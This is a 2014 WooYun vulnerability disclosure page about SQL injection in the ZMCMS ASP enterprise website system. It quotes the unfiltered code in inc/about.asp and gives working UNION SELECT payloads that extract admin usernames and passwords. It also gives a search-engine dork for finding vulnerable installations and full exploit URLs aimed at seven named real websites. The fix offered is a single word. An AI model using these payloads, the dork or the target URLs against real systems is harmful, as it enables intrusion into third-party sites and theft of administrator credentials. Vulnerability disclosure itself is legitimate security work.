当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-070083

漏洞标题:某通用型企业网站管理系统sql注入

相关厂商:追梦企业网站管理系统

漏洞作者: roker

提交时间:2014-07-29 15:15

修复时间:2014-10-27 15:16

公开时间:2014-10-27 15:16

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2014-07-29: 细节已通知厂商并且等待厂商处理中
2014-07-30: 厂商已经确认,细节仅向厂商公开
2014-08-02: 细节向第三方安全合作伙伴开放
2014-09-23: 细节向核心白帽子及相关领域专家公开
2014-10-03: 细节向普通白帽子公开
2014-10-13: 细节向实习白帽子公开
2014-10-27: 细节向公众公开

简要描述:

rt

详细说明:

追梦企业网站管理系统(zmcms)是由追梦工作室基于asp+access/mssql自主研发而成。我们致力于中小企业网站的搭建。根据现有企业的需求。开发适合企业的模块,让企业可以轻松搭建适合自己企业的网站,后台功能强大,管理便捷。代码简单易懂,适合二次开发。我们认为“简单就是美”,因此一直以来,追梦工作室在开发过程中无处不充分考虑用户的使用习惯,尽最大可能降低用户的使用门槛,让用户关注于内容维护本身,而不需要投入过多的时间来学习系统的使用技巧,在细节处下大工夫。..
看到 inc/about.asp

<%
id=request.QueryString("id")
set rs=server.createobject("adodb.recordset")
sql="select * from dy where id="&id
rs.open sql,conn,1,1
id=rs("id")
title=rs("title")
content=UBBCode(rs("content"))
gjza=rs("gjz1")
msa=rs("ms")
zdfy=rs("zdfy")
zmone=rs("zmone")
if rs.eof and rs.bof then
Response.Write("<script language=javascript> alert('信息内容已被删除!');window.location.replace('index.asp');</script>")
end if
%>


直接将id带入了sql语句,没有过滤。类似的文件在 inc文件夹下还有很多。
前台 about.asp

<%@LANGUAGE="VBSCRIPT" CODEPAGE="65001"%>
<!--#include file="Inc/sub.asp" -->
<!--#include file="Inc/about.asp" -->

包含了进来。
exp

about.asp?id=%201%20union%20select%201,password,3,4,5,6,7,8,9,10,11,12,13,14,15%20from%20admin
about.asp?id=%201%20union%20select%201,username,3,4,5,6,7,8,9,10,11,12,13,14,15%20from%20admin
没显示全的话 就用 mid()。


虽然漏洞挺简单的。但是用户量还是蛮多滴。。。
关键字 inurl:"product.asp?pone="

1.jpg


5个实例用以证明通用。

1.jpg


http://www.whhnt.com/about.asp?id=%201%20union%20select%201,password,3,4,5,6,7,8,9,10,11,12,13,14,15%20from%20admin
http://www.qqlqq.com/about.asp?id=%201%20union%20select%201,password,3,4,5,6,7,8,9,10,11,12,13,14,15%20from%20admin
http://www.sl138.com/about.asp?id=%201%20union%20select%201,password,3,4,5,6,7,8,9,10,11,12,13,14,15%20from%20admin
http://www.it8088.com/about.asp?id=%201%20union%20select%201,password,3,4,5,6,7,8,9,10,11,12,13,14,15%20from%20admin
http://www.hqgg.com/about.asp?id=%201%20union%20select%201,password,3,4,5,6,7,8,9,10,11,12,13,14,15%20from%20admin
特殊例子。2的位置显示不出来的话 就用3来显示 需要mid
http://www.ykml.cn/about.asp?id=%201%20union%20select%201,2,username,4,5,6,7,8,9,10,11,12,13,14%20from%20admin
http://www.ykml.cn/about.asp?id=%201%20union%20select%201,2,mid(username,4,5),4,5,6,7,8,9,10,11,12,13,14%20from%20admin

漏洞证明:

1.jpg

修复方案:

过滤

版权声明:转载请注明来源 roker@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:17

确认时间:2014-07-30 09:31

厂商回复:

CNVD未能通过公开渠道获知软件生产厂商联系方式,暂未涉及政府和重要部门案例,未列入处置流程,待厂商认领。

最新状态:

暂无